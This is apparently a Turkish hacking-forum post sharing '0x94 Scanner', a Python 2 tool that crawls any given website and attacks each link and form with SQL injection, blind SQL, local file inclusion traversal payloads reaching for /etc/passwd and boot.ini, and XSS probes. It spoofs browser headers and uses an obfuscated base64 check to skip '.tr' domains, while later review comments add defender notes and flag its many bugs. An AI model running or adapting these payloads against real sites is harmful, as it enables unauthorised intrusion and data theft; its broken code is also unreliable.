
0x94 Scanner GET/POST SQL-LFI-XSS

BlacksGuardian - ait Kullanıcı Resmi (Avatar)
11-06-2013 00:41
#1
0x94 Scanner GET/POST SQL-LFI-XSS
The_Bekir yeni kodlamış. Galiba kısa süre içinde yeni özellikleriyle başka bir tool daha yapacak.

Kod:
#!/usr/bin/python
# -*- coding: utf-8 -*-
# 0x94 Scanner
# (POST/GET SQL scan) - LFI - XSS scan
# Collects all links on the site
# Automatically resolves the ******** URLs of SEO links (word masked by the forum's filter)
# Tries GET and POST SQL injection on every link
# Tries blind GET and POST SQL injection on every link
# When a page changes, prints the changed line to the screen
# Tries XSS
# Tries LFI
# Saves all results to rapor.txt
# Use only for security testing
# Cookie and proxy support are also available
 
import urllib
import urlparse
import sys
import re
import urllib2
from urllib import urlencode
from urlparse import parse_qsl
import httplib
from string import maketrans
import base64
 
# Raw Cookie header value; the openers built further down send it with their requests.
# Leave empty for unauthenticated scanning.
sayfacookie = ""
 
from BeautifulSoup import BeautifulSoup
 
class HTTPAYAR(urllib2.HTTPRedirectHandler):
    """Redirect handler that writes a report line for each redirect, then follows it."""

    def http_error_302(self, req, fp, code, msg, headers):
        # Record the redirect first, then delegate to the stock urllib2 handler.
        # NOTE(review): the stock handler follows the redirect to whatever host the
        # server names; nothing here keeps the request inside the scanned host.
        yaz("URl Yonlenmesi Algilandi",True)
        followed = urllib2.HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, headers)
        return followed

    # 301, 303 and 307 are handled exactly like 302.
    http_error_301 = http_error_302
    http_error_303 = http_error_302
    http_error_307 = http_error_302
   
 
# To send traffic through a proxy, enable the commented line below instead.
# NOTE(review): `cookieprocessor` is not defined anywhere in the listing shown.
#opener = urllib2.build_opener(HTTPAYAR,urllib2.HTTPSHandler(),urllib2.ProxyHandler({'http': '127.0.0.1:8888'}),cookieprocessor)
opener = urllib2.build_opener(
    HTTPAYAR,
    urllib2.HTTPSHandler(),
    urllib2.HTTPCookieProcessor(),
)

# Static request headers. The User-Agent and Referer never vary, so they are a
# stable fingerprint of this tool in a web server's access log.
opener.addheaders = [
    ('User-Agent', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13'),
    ('Referer', 'http://www.google.com'),
    ("Cookie", sayfacookie),
]

# Make this opener the default for every urllib2.urlopen() call in the module.
urllib2.install_opener(opener)

# URLs already handed to the checks; keys are URLs, values are unused placeholders.
aynilinkler = dict()
 
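def yaz(yazi,ekran):
    """Append *yazi* as one line to rapor.txt and optionally echo it to stdout.

    Args:
        yazi: text to record; a newline is appended.
        ekran: when equal to True the text is also printed.

    The report path is relative, so the file is created in the current
    working directory of the process.
    """
    # The context manager closes the report even when the write raises,
    # which the explicit open()/close() pair did not guarantee.
    with open("rapor.txt","a+") as dosya:
        dosya.write(yazi+"\n")
    if ekran==True:
        # Parenthesised form prints the same text under Python 2.
        print(yazi)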
   
   
 
def formyaz(formurl):  
    """Fetch *formurl*, collect the fields of each <form> and pass them to the SQL checks.

    For every form the field names are gathered into one dict, which is then
    given to postget() and blindpost() with the form's method.

    NOTE(review): `toplamveri` is created once and never reset, so fields from
    earlier forms on the page are carried into later ones. `formurl` is also
    reassigned inside the loop, so each relative action is appended to the
    result of the previous one.
    NOTE(review): the bare `except` at the end hides every failure, including
    programming errors, behind one generic message.
    """
 
    toplamveri={}  
   
    # The request is made outside the try block, so a network error propagates to the caller.
    html = urllib2.urlopen(formurl).read()
    soup = BeautifulSoup(html)  
    try:
        forms=soup.findAll("form")        
        for form in forms:  
            if form.has_key('action'):  
                # A relative action (no scheme) is appended to the page URL.
                if form['action'].find('://') == -1:
                        formurl=formurl + "/" + form['action'].strip('/')  
                else:  
                        # Absolute action: only logged; the page URL stays the target.
                        yaz("action: " + formurl,False)
            else:  
                # This branch prints directly instead of going through yaz(), so it is not in the report.
                print "action: " + formurl     
            if form.has_key('method') and form['method'].lower() == 'post':
                    yaz("[POST] action " +formurl,False)
                    # NOTE(review): a <select> without a name attribute raises here (swallowed below).
                    for post_inputselect in form.findAll("select"):
                            yaz(post_inputselect['name'], False)
                            toplamveri[post_inputselect['name']]="bekir"       
                   
                    for post_input in form.findAll("input"):  
                            if post_input.has_key('type'):  
                                # Only text, password, hidden and radio inputs are collected.
                                if post_input['type'].lower() == 'text' or post_input['type'].lower() == 'password' or   post_input['type'].lower() == 'hidden' or post_input['type'].lower() == 'radio':  
                                        if post_input.has_key('id'):  
                                                yaz( post_input['id'],False)
                                                toplamveri[post_input['id']]="'a"
                                        elif post_input.has_key('name'):
                                            yaz(post_input['name'], False)
                                            # Keep the page's own value when present, else use a placeholder.
                                            if post_input.has_key('value'):
                                                toplamveri[post_input['name']]=post_input['value']
                                            else:
                                                toplamveri[post_input['name']]="bekir"
   
                                               
                                               
                   
                    postget(formurl, toplamveri,"POST")
                    blindpost(formurl, toplamveri,"POST")
                       
            # Precedence: this reads as (has method and method == 'get') or (no method at all).
            if form.has_key('method') and form['method'].lower() == 'get' or not form.has_key('method'):  
                yaz("[GET] action " +formurl,False)
                for get_inputselect in form.findAll("select"):
                    if get_inputselect.has_key("name"):
                            yaz(get_inputselect['name'], False)
                            toplamveri[get_inputselect['name']]="bekir"
                           
               
                for get_input in form.findAll("input"):                        
                        if get_input.has_key('type'):  
                            if get_input['type'].lower() == 'text' or get_input['type'].lower() == 'password' or get_input['type'].lower() == 'hidden' or get_input['type'].lower() == 'radio':  
                                    if get_input.has_key('id'):  
                                            yaz(get_input['id'],False)
                                            # NOTE(review): this uses `post_input`, the loop variable of the POST
                                            # branch, not `get_input`; it is unbound if no POST form ran before.
                                            toplamveri[post_input['id']]="'a"
                                    elif get_input.has_key('name'):
                                            yaz(get_input['name'], False)
                                            if get_input.has_key('value'):
                                                toplamveri[get_input['name']]=get_input['value']
                                            else:
                                                toplamveri[get_input['name']]="bekir"
                postget(formurl, toplamveri,"GET")
                blindpost(formurl, toplamveri,"GET")
    except:
        print "Form Degerlerini Alirken Hata olustu"
                                                       
 
def blindpost(url,params,method):
    """Compare a baseline form submission with submissions that carry boolean SQL conditions.

    Args:
        url: form target.
        params: dict of field name -> value, as built by formyaz().
        method: "GET" sends the fields in the query string; anything else sends them as a POST body.

    A difference between baseline and modified response, as counted by
    comparePages(), is written to the report. Defender note: every modified
    request carries one of the literal strings in `post_string` at the end of
    each field value, which is what to look for in request logs.
    """
   
    try:
       
        # Copy of the original field values; each test string is appended to these.
        degisecekdict={}
        for k,v in params.items():
            #print k,v
            degisecekdict[k]=v
           
       
        params = urllib.urlencode(params)
        if method=="GET":
            yaz("Blind GET SQL testi yapiliyor",True)
            # urllib.urlopen is used here, not urllib2; presumably the headers of the
            # installed urllib2 opener do not apply to this request - confirm.
            y = urllib.urlopen(url+"?"+params)
        else:
            yaz("Blind POST SQL testi yapiliyor",True)
            y = urllib2.urlopen(url, params)
       
    # NOTE(review): `urlnormal` is not defined in this function, so both handlers
    # below would raise NameError if they ran.
    except urllib2.HTTPError,  e:
        if(e.code==500):
            yaz("Http 500 Dondu " +urlnormal,False)
       
    except urllib2.URLError,  e:
        mesaj="Hata olustu , sebebi =  %s - %s \n" %(e.reason,urlnormal)
                #yaz(mesaj)
    except:
        # The message is built but never reported.
        mesaj="Bilinmeyen hata oluştu\n"    
 
   
   
   
    post_string =  ["'aNd 1=1",
                    "'aNd 1=2",
                    "' aNd 1=MID((database()),1,1)>1",
                    "' aNd 2=MID((@@version,1,1)--+",
                    "' aNd 3=MID((@@version,1,1)--+",
                    "' aNd 4=MID((@@version,1,1)--+",
                    "' aNd 5=MID((@@version,1,1)--+"]  
    ipatla=0
    yenidict={}
    # `ipatla` is incremented once per test string inside the for loop, so on the
    # normal path one pass over the seven strings already ends this while loop.
    while ipatla < 6:
       
        for postcode in post_string:       
            for k,v in degisecekdict.items():
                    yenidict[k]=v+postcode
                    print k,v+postcode
       
               
            try:
                params = urllib.urlencode(yenidict)
                ipatla=ipatla+1
                if method=="GET":
                    yaz("Blind GET SQL testi yapiliyor",True)
                    f = urllib.urlopen(url+"?"+params)
                else:
                    yaz("Blind POST SQL testi yapiliyor",True)
                    f = urllib2.urlopen(url, params)
               
            except urllib2.HTTPError,  e:
                if(e.code==500):
                    yaz("Http 500 Dondu " +url,False)
               
            except urllib2.URLError,  e:
                mesaj="Hata olustu , sebebi =  %s - %s \n" %(e.reason,url)
                        #yaz(mesaj)
            except:
                mesaj="Bilinmeyen hata oluştu\n"
                        #yaz(mesaj)  
           
            # NOTE(review): `y` and `f` are unbound (or stale) when a request above failed.
            # `y.read()` is also called on every iteration; presumably it returns an empty
            # string after the first call, making later comparisons unreliable - confirm.
            if (comparePages(y.read(),f.read(),f.geturl())):
                mesaj="[+] BLind POST Sayfada Degisiklik oldu %s !!![+]" % f.geturl()+"POST DATASI"+postcode
               
                yaz(mesaj,True)
 
 
def postget(url, params, method):
    """Submit the form fields with a quote suffix and scan the response for database error text.

    Args:
        url: form target.
        params: dict of field name -> value.
        method: "GET" for a query-string request, anything else for a POST body.

    Detection is delegated to sqlkontrol(); the label passed to it says
    "[POST Sayfasi]" for both methods.
    """
    try:
        # Every value gets the same two-character suffix appended.
        postgetdict={}
        for k,v in params.items():
            postgetdict[k]=v+"'a"
           
        params = urllib.urlencode(postgetdict)
        if method=="GET":
            yaz("GET SQL testi yapiliyor",True)
            f = urllib.urlopen(url+"?"+params)
        else:
            yaz("POST SQL testi yapiliyor",True)
            f = urllib2.urlopen(url, params)
        sqlkontrol (f.read(),url+" [POST Sayfasi]")
       
    # NOTE(review): `urlnormal` is not defined in this function; the two handlers
    # below would raise NameError instead of reporting.
    except urllib2.HTTPError,  e:
        if(e.code==500):
            yaz("Http 500 Dondu " +urlnormal,False)
       
    except urllib2.URLError,  e:
        mesaj="Hata olustu , sebebi =  %s - %s \n" %(e.reason,urlnormal)
                #yaz(mesaj)
    except:
        # The message is built but never reported.
        mesaj="Bilinmeyen hata oluştu\n"
                #yaz(mesaj)      
   
 
 
def comparePages(page1,page2,deurl):
    """Return a rough difference score between two HTML documents.

    Both pages are split on HTML tags. The score is the larger of two counts:
    text fragments of *page1* that do not occur anywhere in *page2*, and the
    reverse. Each fragment of *page1* missing from *page2* is also written to
    the report together with *deurl*.
    """
    tag_pattern = "<[^>]+>"
    fragments_a = re.split(tag_pattern, page1)
    fragments_b = re.split(tag_pattern, page2)

    missing_from_b = 0
    for fragment in fragments_a:
        if fragment in page2:
            continue
        # Report the fragment that disappeared, with the URL it belongs to.
        satir = "Link %s  \n" % (deurl)
        satir = satir + "Degisik durum Satiri %s \n" % (fragment)
        yaz(satir+"\n",False)
        missing_from_b += 1

    # The reverse direction is only counted, not reported.
    missing_from_a = sum(1 for fragment in fragments_b if fragment not in page1)

    return max(missing_from_b, missing_from_a)
 
 
def sqlkontrol(response,urlnormal):
    """Report every known database or runtime error signature found in *response*.

    Args:
        response: body of an HTTP response.
        urlnormal: label (normally the requested URL) placed at the start of each report line.

    Each signature is checked independently, so one response can produce
    several report lines. Some patterns are generic ("Type mismatch",
    "Fatal Error ... on line") and will also match pages that merely quote
    such text. Defender note: these checks only see verbose error pages, so
    suppressing error detail hides this signal without fixing the query.
    """
    print("SQL hata mesaji kontrol ediliyor")

    # (regular expression, report format) pairs, checked in this order.
    imzalar = [
        ("Microsoft OLE DB Provider for SQL Server", "%s MS-SQL Server error"),
        (r"\[Microsoft\]\[ODBC Microsoft Access Driver\] Syntax error", "%s MS-Access error"),
        (r"Microsoft OLE DB Provider for ODBC Drivers.*\[Microsoft\]\[ODBC SQL Server Driver\]", "%s MS-SQL Server error"),
        (r"Microsoft OLE DB Provider for ODBC Drivers.*\[Microsoft\]\[ODBC Access Driver\]", "%s MS-Access error"),
        ("Microsoft JET Database Engine", "%s MS Jet database engine error"),
        ("ADODB.Command.*error", "%s ADODB Error"),
        ("Microsoft VBScript runtime", "%s VBScript runtime error"),
        ("Type mismatch", "%s VBScript / ASP error"),
        (r"Server Error.*System\.Data\.OleDb\.OleDbException", "%s ASP .NET OLEDB Exception"),
        ("Invalid SQL statement or JDBC", "%s Apache Tomcat JDBC error"),
        ("Warning: mysql_fetch_array", "%s MySQL Server error"),
        ("Warning.*supplied argument is not a valid MySQL result", "%s MySQL Server error"),
        ("You have an error in your SQL syntax.*on line", "%s MySQL Server error"),
        ("You have an error in your SQL syntax.*at line", "%s MySQL Server error"),
        (r"Warning.*mysql_.*\(\)", "%s MySQL Server error"),
        ("ORA-[0-9][0-9][0-9][0-9]", "%s Oracle DB Server error"),
        ("DorisDuke error", "%s DorisDuke error\n"),
        (r"javax\.servlet\.ServletException", "%s Java Servlet error"),
        (r"org\.apache\.jasper\.JasperException", "%s Apache Tomcat error"),
        ("Warning.*failed to open stream", "%s PHP error"),
        ("Fatal Error.*on line", "%s PHP error"),
        ("Fatal Error.*at line", "%s PHP error"),
    ]

    for desen, bicim in imzalar:
        # DOTALL lets ".*" span line breaks in the response body.
        if re.search(desen, response, re.DOTALL):
            yaz(bicim % urlnormal, True)
 
 
def xsstest(xsstesturl):
    """Append a fixed marker to the URL and check whether the response echoes it.

    On a hit the URL is passed on to xsstara().

    NOTE(review): the marker is plain alphanumeric text, so an echo only shows
    that input is reflected; it says nothing about whether markup characters
    are encoded on output, and a hit is therefore not proof of XSS.
    Defender note: the marker string is constant, so these requests are easy
    to find in access logs.
    """
 
    try:
        yaz("XSS Test ediliyor ... ",True)
        #urlnormal=lfiurl.replace("=", "=bekirburadaydi11111"+lfidizin)
        urlac = urllib2.urlopen(xsstesturl+"bekirburadaydi11111")
        response = urlac.read()
        if "bekirburadaydi11111" in response:
            yaz("XSS Test BULUNDU : " + xsstesturl+"bekirburadaydi11111",True)
            xsstara(xsstesturl)
                 
    except urllib2.HTTPError,e:
        if(e.code==500):
            yaz("Http 500 Dondu " +xsstesturl,True)
   
    except urllib2.URLError,  e:
        mesaj="Hata olustu , sebebi =  %s - %s \n" %(e.reason,xsstesturl)
           #yaz(mesaj)
    except:
        # The message is built but never reported.
        mesaj="Bilinmeyen hata oluştu\n"          
       
 
def xsstara(xssurl):
    """Second reflection check: put the fixed marker after every "=" in a URL.

    NOTE(review): the body reads `lfiurl`, which is not defined in this
    function (the parameter is `xssurl`). As written that raises NameError,
    which the bare `except` swallows, so the function appears to do nothing
    beyond the first log line. `urlnormal` in the handlers would be unbound
    for the same reason.
    """
    try:
        yaz("XSS Taraniyor ... ",True)
        urlnormal=lfiurl.replace("=", "=bekirburadaydi11111")
        urlac = urllib2.urlopen(urlnormal)
        response = urlac.read()
        # As in xsstest(), an echoed alphanumeric marker shows reflection only.
        if "bekirburadaydi11111" in response:
            yaz("XSS BULUNDU : " + urlnormal,True)
                   
    except urllib2.HTTPError,  e:
        if(e.code==500):
            yaz("Http 500 Dondu " +urlnormal,True)
   
    except urllib2.URLError,  e:
        mesaj="Hata olustu , sebebi =  %s - %s \n" %(e.reason,urlnormal)
            #yaz(mesaj)
    except:
        mesaj="Bilinmeyen hata oluştu\n"    
 
def lfitara(lfibul):
    """Request a URL with each path in `lfiyollar` as parameter value and look for file contents.

    A response containing "root:x:" or "noexecute=optout" is reported as a
    local file inclusion finding.

    NOTE(review): the loop reads `lfiurl`, which is not defined in this
    function (the parameter is `lfibul`); as written this raises NameError on
    the first iteration and the bare `except` hides it.
    NOTE(review): the try block wraps the whole loop, so the first HTTP or
    network error ends the scan of the remaining paths.
    Defender note: the requested values are the fixed traversal strings below;
    they are well suited to log or WAF signatures.
    """
   
    # Relative paths to /etc/passwd and boot.ini at increasing depth, each with
    # and without a trailing %00.
    lfiyollar=['/etc/passwd',
        '../etc/passwd',
        '../../etc/passwd',
        '../../../etc/passwd',
        '../../../../etc/passwd',
        '../../../../../etc/passwd',
        '../../../../../../etc/passwd',
        '../../../../../../../etc/passwd',
        '../../../../../../../../etc/passwd',
        '../../../../../../../../../etc/passwd',
        '../../../../../../../../../../etc/passwd',
        '../../../../../../../../../../../etc/passwd',
        '../etc/passwd%00',
        '../../etc/passwd%00',
        '../../../etc/passwd%00',
        '../../../../etc/passwd%00',
        '../../../../../etc/passwd%00',
        '../../../../../../etc/passwd%00',
        '../../../../../../../etc/passwd%00',
        '../../../../../../../../etc/passwd%00',
        '../../../../../../../../../etc/passwd%00',
        '../../../../../../../../../../etc/passwd%00',
        '../../../../../../../../../../../etc/passwd%00',
        'boot.ini%00',
        '.../boot.ini%00',
        '../../boot.ini%00',
        '../../../boot.ini%00',
        '../../../../boot.ini%00',
        '../../../../../boot.ini%00',
        '../../../../../../boot.ini%00',
        '../../../../../../../boot.ini%00',
        '../../../../../../../../boot.ini%00',
        '../../../../../../../../../boot.ini%00',
        '../../../../../../../../../../boot.ini%00',
        '../../../../../../../../../../../boot.ini%00',
        'boot.ini',
        '.../boot.ini',
        '../../boot.ini',
        '../../../boot.ini',
        '../../../../boot.ini',
        '../../../../../boot.ini',
        '../../../../../../boot.ini',
        '../../../../../../../boot.ini',
        '../../../../../../../../boot.ini',
        '../../../../../../../../../boot.ini',
        '../../../../../../../../../../boot.ini',
        '../../../../../../../../../../../boot.ini'        
       
        ]
       
    try:
        for lfidizin in lfiyollar:
            yaz("LFi Taraniyor ... ",True)
            # Every "=" in the URL is followed by the path, so all parameters change at once.
            urlnormal=lfiurl.replace("=", "="+lfidizin)
            urlac = urllib2.urlopen(urlnormal)
            response = urlac.read()
            if "root:x:" in response or "noexecute=optout" in response:
                yaz("LFI BULUNDU : " + urlnormal,True)
               
    except urllib2.HTTPError,  e:
        if(e.code==500):
            yaz("Http 500 Dondu " +urlnormal,True)
   
    except urllib2.URLError,  e:
        mesaj="Hata olustu , sebebi =  %s - %s \n" %(e.reason,urlnormal)
            #yaz(mesaj)
    except:
        # The message is built but never reported.
        mesaj="Bilinmeyen hata oluştu\n"
                #yaz(mesaj)      
   
 
def lfitest(lfiurl):
    """Probe a URL for file-inclusion behaviour using a fixed placeholder file name.

    Every "=" in the URL is followed by "bekirburadaydi.txt". If the response
    contains the text "failed to open stream", the URL is reported and passed
    to lfitara().

    Defender note: the check depends on the application showing that warning
    text to the client, and the placeholder file name is constant in request
    logs.
    """
   
    try:
        yaz("LFI Test Yapiliyor ... ",True)    
        urlnormal=lfiurl.replace("=", "=bekirburadaydi.txt")
        urlac = urllib2.urlopen(urlnormal)
        response = urlac.read()
        if "failed to open stream" in response:
            yaz("LFI Testi BULUNDU : " + urlnormal,True)
            lfitara(lfiurl)
               
    except urllib2.HTTPError,  e:
        # Only a 500 is reported; other HTTP errors are dropped silently.
        if(e.code==500):
            yaz("Http 500 Dondu " +urlnormal,True)
   
    except urllib2.URLError,  e:
        mesaj="Hata olustu , sebebi =  %s - %s \n" %(e.reason,urlnormal)
            #yaz(mesaj)
    except:
        # The message is built but never reported.
        mesaj="Bilinmeyen hata oluştu\n"
            #yaz(mesaj)      
 
   
   
   
 
def sql(urlnormal):
    """Request the URL with a single quote after every "=" and scan the response for error text.

    The response body goes to sqlkontrol(), which reports any database or
    runtime error signature it recognises.
    """
    try:
        yaz("SQL Test Taraniyor ... ",True)
        # The parameter is rebound, so report lines show the modified URL, not the original.
        urlnormal=urlnormal.replace("=", "='")
        urlac = urllib2.urlopen(urlnormal)
        response = urlac.read()
        sqlkontrol(response,urlnormal)
       
    except urllib2.HTTPError,  e:
        # A 500 is logged, but its body is never passed to sqlkontrol().
        if(e.code==500):
            yaz("Http 500 Dondu " +urlnormal,True)
 
    except urllib2.URLError,  e:
        mesaj="Hata olustu , sebebi =  %s - %s \n" %(e.reason,urlnormal)
        #yaz(mesaj)
    except:
        # The message is built but never reported.
        mesaj="Bilinmeyen hata oluştu\n"
        #yaz(mesaj)  
       
 
def blind(urlblind):
    """Boolean-based blind SQL check on a URL that has a query string.

    The unmodified page is fetched once. For paired always-true and
    always-false conditions the modified URLs are requested, and a change is
    reported when comparePages() scores the true response against the
    unmodified page higher than it scores the true response against the
    false response.

    NOTE(review): only the first six of the eight condition pairs are used
    (`while i < 6`).
    NOTE(review): the first fetch is outside any try block, so a network error
    propagates to the caller.
    """
   
 
    linknormal = urllib2.urlopen(urlblind)
    normalkaynak=linknormal.read()
 
    yaz("Blind Taraniyor ... ",True)
    true_strings = [" and 1=1"," ' and 1=1"," and 'a'='a","' and 'a'='a","' and 'a'='a"," and 1 like 1"," and 1 like 1/*"," and 1=1--"]          
    false_strings =[" and 1=2"," ' and 1=2"," and 'a'='b","' and 'a'='b","' and 'a'='b"," and 1 like 2"," and 1 like 2/*"," and 1=2--"]
    i = 0
    while i < 6:    
        # The encoded condition is appended to the URL and also inserted before every "&".
        blindtrue = urlblind + urlencode(parse_qsl(true_strings[i]))
        yaz("Denenen Blind : "+true_strings[i],True)
        try:
            req1 = urllib2.Request(blindtrue.replace("&",urlencode(parse_qsl(true_strings[i])) +"&").replace(" ", "%20"))
            # NOTE(review): these header names include ": " and "UserAgent" has no hyphen,
            # so they are not the standard headers; the Referer value also prefixes
            # "http://" to what is presumably already a full URL - confirm.
            req1.add_header('UserAgent: ','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)')
            req1.add_header('Keep-Alive: ','115')
            req1.add_header('Referer: ','http://'+urlblind)
            response1 = urllib2.urlopen(req1)
            html1 = response1.read()
           
        except urllib2.HTTPError,e:
            if(e.code==500):
                yaz("Http 500 Dondu " +urlblind,True)
        except urllib2.URLError,e:
            mesaj="Hata olustu , sebebi =  %s - %s \n" %(e.reason,urlblind)
            #yaz(mesaj)
       
        except:
            mesaj="Bilinmeyen hata oluştu\n"
            #yaz(mesaj)
           
        blindfalse = urlblind + urlencode(parse_qsl(false_strings[i]))
        yaz("Denenen Blind:"+false_strings[i],True)
        try:
            # NOTE(review): `i` is incremented before the request is built, so the condition
            # inserted before "&" comes from the next pair, not the one appended above.
            i=i+1
            req2 = urllib2.Request(blindfalse.replace("&",urlencode(parse_qsl(false_strings[i])) +"&").replace(" ", "%20"))
            req2.add_header('UserAgent: ','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)')
            req2.add_header('Keep-Alive: ','115')
            req2.add_header('Referer: ','http://'+urlblind)
            response2 = urllib2.urlopen(req2)
            html2 = response2.read()
               
        except urllib2.HTTPError,e:
            if(e.code==500):
                # NOTE(review): `urlnormal` is not defined in this function.
                yaz("Http 500 Dondu " +urlnormal,True)
        except urllib2.URLError,e:
            mesaj="Hata olustu , sebebi =  %s - %s \n" %(e.reason,urlblind)
            #yaz(mesaj)
       
        except:
            mesaj="Bilinmeyen hata oluştu\n"
            #yaz(mesaj)
   
       
             
        # NOTE(review): html1, html2 and response2 are unbound or left over from the previous
        # iteration when a request above failed, so this comparison can raise or mislead.
        if (comparePages(html1,normalkaynak,response2.geturl()) > comparePages(html1,html2,linknormal.geturl())):
                    mesaj="[+] Sayfada Degisiklik oldu %s !!![+]" % urlblind
                    yaz(mesaj,True)
 
   
class YeniOpener(urllib.FancyURLopener):  
    """URL opener used for the crawl in linkler(), with a fixed browser-like version string."""
    # Constant value, differs from the User-Agent set on the urllib2 opener above.
    version = 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15'
 
def aynivarmi(keyurl):
    """Return True when *keyurl* is already recorded in the module-level `aynilinkler` dict."""
    return keyurl in aynilinkler
 
def ********bypass(link):
    # NOTE(review): the forum's word filter replaced part of this function's name and the
    # header key below with asterisks, so the listing is not valid Python as displayed.
    # The masked key is presumably the HTTP redirect target header - confirm against the
    # original source.
    #
    # Purpose: send a HEAD request for *link* and, if the response names a new address,
    # return that address; otherwise return *link*. A relative target is prefixed with
    # "http://" plus the host of *link*.
    #
    # NOTE(review): httplib.HTTPConnection is used for every link, so https URLs are
    # requested over plain HTTP. On any exception the function falls through and
    # returns None.
    try:
        o = urlparse.urlparse(link,allow_fragments=True)
        conn = httplib.HTTPConnection(o.netloc)
        path = o.path
        if o.query:
                path +='?'+o.query  
        conn.request("HEAD", path)
        res = conn.getresponse()
        headers = dict(res.getheaders())
        if headers.has_key('********'):
            # A value without "http" is treated as relative to the current host.
            if "http" not in headers['********']:
                yaz("Eski URL "+link,True)
                yaz("Yeni URL "+o.hostname+headers['********'],True)
                return "http://"+o.hostname+headers['********'].encode('utf-8').strip()
            else:
                return headers['********'].encode('utf-8').strip()
        else:
            return link.encode('utf-8').strip()
    except:
        print "******** Alinirken Hata oldu"
 
def linkler(urltara):
    """Fetch *urltara*, resolve each link on it and run the checks on links judged to be in scope.

    Each new in-scope link goes to formyaz(); links containing "?" also go to
    sql(), blind() and xsstest(), and links containing "php?" to lfitest().
    Only links found on the start page are processed; the function does not
    call itself on the pages it finds.

    NOTE(review): scope is decided by `host in tamurl`, a substring test. A URL
    on another host that merely contains the hostname, for example in its path
    or query, passes it, so requests can reach systems outside the intended
    target.
    NOTE(review): the bare `except` wraps the whole loop, so the first error in
    any check ends processing of all remaining links. That includes the
    TypeError raised by `host in tamurl` when the redirect helper returns None.
    """
    try:
        linkopener = YeniOpener()
        linkopener.addheaders = [
            ('User-Agent', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13'),
            ('Referer', 'http://www.google.com'),
            ("Cookie", sayfacookie)]
       
        page = linkopener.open(urltara)
        host=urlparse.urlparse(urltara).hostname
        text = page.read()
        page.close()
        soup = BeautifulSoup(text)
   
        for tag in soup.findAll('a', href=True):
            # Make the href absolute relative to the start page.
            tag['href'] = urlparse.urljoin(urltara, tag['href'])
            asilurl=tag['href'].encode('utf-8').strip()
            tamurl=********bypass(asilurl)
            if aynivarmi(tamurl)==False:
                if host in tamurl:
                    # Mark as seen before testing so the same URL is not processed twice.
                    aynilinkler[tamurl]="bekir"
                    formyaz(tamurl)
                    if "javascript" not in tamurl:
                        if "php?" in tamurl:
                            lfitest(tamurl)
                           
                        if "?" in tamurl:
                            sql(tamurl)
                            blind(tamurl)
                            xsstest(tamurl)
 
    except:
        print "Linkleri alirken hata olustu"
 
def main():
    """Print the banner and run linkler() on each URL given on the command line.

    With no arguments a usage line is printed and the process exits with status 1.
    """
    print "########################################"
    print "#0x94 Scanner"
    print "#(POST/GET SQL SCAN) -LFI-XSS SCAN "
    print "#by 0x94 ****.a The_BeKiR"
    print "########################################"
    if len(sys.argv) == 1:
        print "Kullanim: %s URL [URL]..." % sys.argv[0]
        sys.exit(1)
    for url in sys.argv[1:]:
        # Obfuscated exclusion: "LnRy" is base64 for ".tr". The translation table maps
        # "." "t" "r" to "{" "}" ">", so "{}>" shows up in the translated URL when the
        # original contains ".tr" (or already contains those literal characters in a
        # matching position). Such URLs are skipped without any message.
        giris = base64.b64decode("LnRy")
        cikis = "{}>"
        ooooo = maketrans(giris, cikis)
        asd=url.translate(ooooo)
        if "{}>" not in asd:
            linkler(url)
 
 
# Run the scanner only when the file is executed as a script, not when it is imported.
if __name__ == "__main__":
    main()